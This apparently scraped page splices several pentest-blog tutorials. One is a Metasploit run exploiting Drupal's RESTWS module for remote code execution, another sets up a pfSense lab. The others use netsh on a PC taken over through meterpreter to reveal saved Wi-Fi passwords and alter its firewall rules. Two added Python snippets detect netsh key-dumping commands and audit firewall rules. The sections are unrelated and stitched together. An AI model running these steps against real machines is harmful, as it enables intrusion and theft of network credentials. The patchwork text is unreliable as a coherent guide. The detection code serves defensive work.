Hack Drupal Website using Drupal RESTWS Module Remote PHP Code Execution




Exploit Targets
RESTWS 2.x

Requirement
Attacker: Kali Linux
Victim PC: Drupal

Open a Kali terminal and type msfconsole



msf exploit (drupal_restws_exec)>set targeturi /
msf exploit (drupal_restws_exec)>set rhost 192.168.0.4 (IP of Remote Host)
msf exploit (drupal_restws_exec)>exploit 


Firewall Pentest Lab Setup with pfSense in VMware

Firewall: It is a computer system or network that is designed to block unauthorized access while permitting outward communication. Firewalls hold a lot of importance in our technical world, as they assure the security of our systems as well as our data. A firewall in a network helps us to secure the whole network. It acts as a network security device that grants or rejects network access to traffic flows between untrusted zones. Hence the importance of a firewall.

To secure a network we should always use a third-party firewall instead of Windows' own firewall, as it makes configuration of the whole network easy and keeps it in one system only. If you use Windows' own firewall, you have to configure it PC by PC, which will take a lot of your time.

Setting up a firewall can be complicated. Therefore, in this article we will learn how to set up a firewall using pfSense. By setting up this firewall we will create a wall between our networks, which will divide our network into two parts, i.e. an external network and an internal network.

You can download the ISO image for pfSense from here:

Now that you have the ISO image, set up pfSense in your virtual machine just as you would set up Windows, then turn its power on and pfSense will open:


And it will boot itself automatically in a few seconds:


Once it's rebooted, select Accept these Settings.


From the next dialog box, select Quick/Easy Install.


When you click OK, it will allow the installation process to begin without asking unnecessary questions:


And the installation begins:


Now, for installing custom configuration, select the Standard Kernel option.


And it will start installing:


Now, select Reboot option so that the firewall can start.


Thus, rebooting will begin.


After the rebooting process, it will ask you if you want to set up VLANs. Here just type n for no and hit enter.


Now it will ask you to name the WAN and LAN interfaces. Give the name le0 to WAN and le1 to LAN. Then just hit enter when it asks you to name an optional interface.


It will now show you the interfaces and their names, and will require your permission to proceed. Press y for yes to permit it to proceed.


Now, in the following image you can see that it has automatically taken an IP address for WAN, i.e. 192.168.1.7. If you wish to set a desired IP for WAN, choose option 2 and press 1 for the configuration of WAN.


It will ask whether you want to assign an IPv4 IP address. Here, press n for no. When you hit enter, it will ask whether you want to assign an IPv4 IP address. Here, enter your desired IP address and press enter. Then it will ask you for the subnet mask of the IP address that you have just entered. As our IP address is class C, we will give 24 as the subnet mask. After you hit enter, it will ask whether you want to give an upstream gateway. Here, just press enter. When it asks you to set IPv6 via DHCP6, simply press enter without typing anything else, as we do not require IPv6. And when it asks you about HTTP web configuration, press n for no.


You can see that your desired IP for WAN has been set up. Hit enter to continue.


Similarly, you can set up the LAN IP address by selecting option 2 for assigning an IP address and then selecting 2 for LAN.


Just like before, it will ask you for the IP address of the LAN, so enter your LAN IP address. Then it will ask you for the subnet mask; here we have given a subnet mask of 8, as our IP is class A. Just hit enter when it asks you to enter an upstream gateway. Also hit enter when it asks you to enter IPv6, as we do not require it. And then press y for the HTTP revert option.


And just like this, your LAN IP address has been set up. Now, press enter to continue.


Now, to check that your firewall has been configured properly, let's ping an IP address. Select option 7 and enter the IP address you want to ping. If it pings successfully, your firewall has been configured successfully, and you can press enter to continue.


So, this is how you can install and configure your firewall to protect your network.

Wifi Penetration Testing in Remote PC (Part 1)

People often say "news travels fast". How? The answer is one word: wireless. Wireless networks all around the world help us to move faster in our lives. They enable us to make more of our already running time. But today, wireless connections to the internet have become a necessity. And it is now very much possible to take advantage of this necessity.

WiFi: It is a technology that allows electronic devices to connect to the internet in a given area. WiFi has a lot of advantages. Wireless networks are easy to set up and inexpensive. They're also unobtrusive -- unless you're on the lookout for a place to watch streaming movies on your tablet, you may not even notice when you're in a hotspot. A wireless network uses radio waves, just like cell phones, televisions and radios do. In fact, communication across a wireless network is a lot like two-way radio communication. Here's what happens:

1. A computer's wireless adapter translates data into a radio signal and transmits it using an antenna.
2. A wireless router receives the signal and decodes it. The router sends the information to the Internet using a physical, wired Ethernet connection.

The process also works in reverse, with the router receiving information from the Internet, translating it into a radio signal and sending it to the computer's wireless adapter.
When you connect your device to a WiFi network, the device stores all the information about that network. So, after taking control of the victim PC, you can learn everything about their WiFi router, including its password.

For WiFi penetration testing, take a session through meterpreter and reach the shell of your remote PC, then run the following commands.
Our first command allows us to see all the networks to which the remote PC has ever been connected.


netsh wlan show profiles 


Our next command helps us to see the details and password of a particular router.

netsh wlan show profiles name=[profile name] key=clear

Here, profile name is the WiFi name.
The following image shows the details of the router named "Yashika":


The next image shows us the password of the router named Yashika under the heading Key Content. We can see that the password is 991*******


Our next command allows us to delete a particular wifi connection.

netsh wlan delete profile name=[profile name]
Here, profile name is the WiFi name.


Next command allows us to set the priority of a wifi network.

netsh wlan set profileorder name=[profile name] interface=[interface_name] priority=1

Here, profile name is the WiFi name and interface name is the network type, such as WLAN or LAN.


The next command allows us to stop our remote PC from automatically connecting to a network.

netsh wlan set profileparameter name=[profile name] connectionmode=manual

Here, profile name is wifi name.


The next command allows us to export all the details about a WLAN network.
netsh wlan export profile name=[profile name]
Here, profile name is the WiFi name.


The next command helps us to import any WLAN file to a particular WiFi network.

netsh wlan add profile filename=[path_and_filename.xml] interface=[interface_name]
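
From the defender's side, each of the netsh wlan commands above leaves a process command line that endpoint logging can match. The following Python is an added example, not part of the original article; the host names and command lines in SAMPLE_EVENTS are constructed, and the severity labels are this example's own assumption.

```python
import re

# Constructed process-creation records (host, command line) for illustration.
SAMPLE_EVENTS = [
    ("WS-01", "netsh wlan show profiles"),
    ("WS-01", 'netsh.exe wlan show profiles name="Yashika" key=clear'),
    ("WS-02", r"C:\Windows\System32\netsh.exe WLAN export profile name=Office key=clear"),
    ("WS-02", "netsh wlan delete profile name=Office"),
    ("WS-03", "netsh wlan set profileparameter name=Guest connectionmode=manual"),
    ("WS-03", "ipconfig /all"),
]

# A token is a run of bare characters and/or double-quoted strings,
# so name="Home Net" stays in one piece.
TOKEN = re.compile(r'(?:[^\s"]+|"[^"]*")+')
CHANGES = {("delete", "profile"), ("add", "profile"),
           ("set", "profileorder"), ("set", "profileparameter")}

def classify(cmdline):
    """Return (severity, reason) for a netsh wlan command line, else None."""
    toks = [t.replace('"', "").lower() for t in TOKEN.findall(cmdline)]
    if len(toks) < 4 or toks[1] != "wlan":
        return None
    if not re.search(r"(^|[\\/])netsh(\.exe)?$", toks[0]):
        return None
    verb, obj = toks[2], toks[3]
    clear = "key=clear" in toks[4:]
    if verb == "show" and obj in ("profile", "profiles"):
        return ("high", "saved key shown in clear text") if clear else ("low", "saved profiles listed")
    if verb == "export" and obj == "profile":
        return ("high", "profile exported with clear-text key") if clear else ("medium", "profile exported")
    if (verb, obj) in CHANGES:
        return ("medium", "saved Wi-Fi configuration changed")
    return None

def scan(events):
    """Keep only the events that classify() flags, with host attached."""
    hits = []
    for host, cmdline in events:
        verdict = classify(cmdline)
        if verdict:
            hits.append((host, *verdict))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The same classifier can be fed command lines from any process-creation log source once they are reduced to (host, command line) pairs.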


This concludes part 1 of our WiFi penetration testing.

Firewall Penetration in Remote Windows PC (Part 3)

To execute all the given commands, you first need to hack your victim; to do so, click here.
To read part 1 click here, and for part 2 here.

In this article, we will learn how to block/allow a particular IP address in the remote PC's firewall. We will also learn how to view details of the programs added to the exception/allowed list and the details of the ports added to the exception/allowed list. Along with this, we will learn how to see the status of the main settings of the firewall and its current profile, i.e. whether it is on or off.

First of all, to make any changes to the firewall on the remote PC, we should first be able to check the mode of the firewall, that is, whether it's on or off. So for every following command, first take a session through meterpreter along with administrator privileges. After doing so, go to the shell of the remote PC and type:


netsh advfirewall show currentprofiles



Once we know the firewall profile, we can see which programs are allowed by the host of the remote PC. For this, type:

netsh firewall show allowedprogram


We can also see which ports are allowed by the host of the remote PC. For this, type:

netsh firewall show portopening


Our next command is to see the status of the main settings. And to see them, type:
netsh firewall show config


Next, we can also see the location of the file in which all the firewall logs are kept. For this, type:
netsh firewall show logging


The firewall also allows us to block a single IP address while allowing the others, and vice versa. So first let us learn how we can block a single IP. For this, type:
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=192.168.0.15/32
(In the above command, "/32" is the subnet mask of the IP.)


After executing the said command, we can see the following result:


If we now look at the properties of the IP Block rule, we can see that the IP 192.168.0.15 is blocked:


Now, similarly, to allow a particular IP address, type:
netsh advfirewall firewall add rule name="Allow IP" dir=in interface=any action=allow remoteip=192.168.0.15/32
(In the above command, "/32" is the subnet mask of the IP.)


After executing the said command, you can see the following result:


If we now look at the properties of the Allow IP rule, we can see that the IP 192.168.0.15 is allowed:
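
Rules like the two added above can be audited from a dump of the rule set (netsh advfirewall firewall show rule name=all). The following Python is an added example, not part of the original article: it parses a constructed, trimmed sample of that output and reports single addresses that inbound rules both allow and block. In Windows Firewall a block rule takes precedence over an allow rule, so the "Allow IP" rule has no effect while "IP Block" exists.

```python
import ipaddress

# Constructed sample in the layout printed by
# `netsh advfirewall firewall show rule name=all` (fields trimmed for brevity).
SAMPLE = """\
Rule Name:                            IP Block
----------------------------------------------------------------------
Direction:                            In
RemoteIP:                             192.168.0.15/32
Action:                               Block

Rule Name:                            Allow IP
----------------------------------------------------------------------
Direction:                            In
RemoteIP:                             192.168.0.15/32
Action:                               Allow

Rule Name:                            File and Printer Sharing (Echo Request - ICMPv4-In)
----------------------------------------------------------------------
Direction:                            In
RemoteIP:                             LocalSubnet
Action:                               Allow
"""

def parse_rules(text):
    """One dict per rule, keyed by field name."""
    rules = []
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key == "Rule Name":
            rules.append({})
        if sep and rules:
            rules[-1][key] = value.strip()
    return rules

def host_conflicts(rules):
    """Single addresses that inbound rules both allow and block."""
    seen = {}
    for r in rules:
        for item in r.get("RemoteIP", "").split(","):
            try:
                net = ipaddress.ip_network(item, strict=False)
            except ValueError:
                continue  # keywords such as Any or LocalSubnet, or ranges
            if r.get("Direction") == "In" and net.num_addresses == 1:
                seen.setdefault(str(net.network_address), set()).add(r.get("Action"))
    # Block rules take precedence over allow rules in Windows Firewall.
    return sorted(h for h, acts in seen.items() if {"Allow", "Block"} <= acts)
```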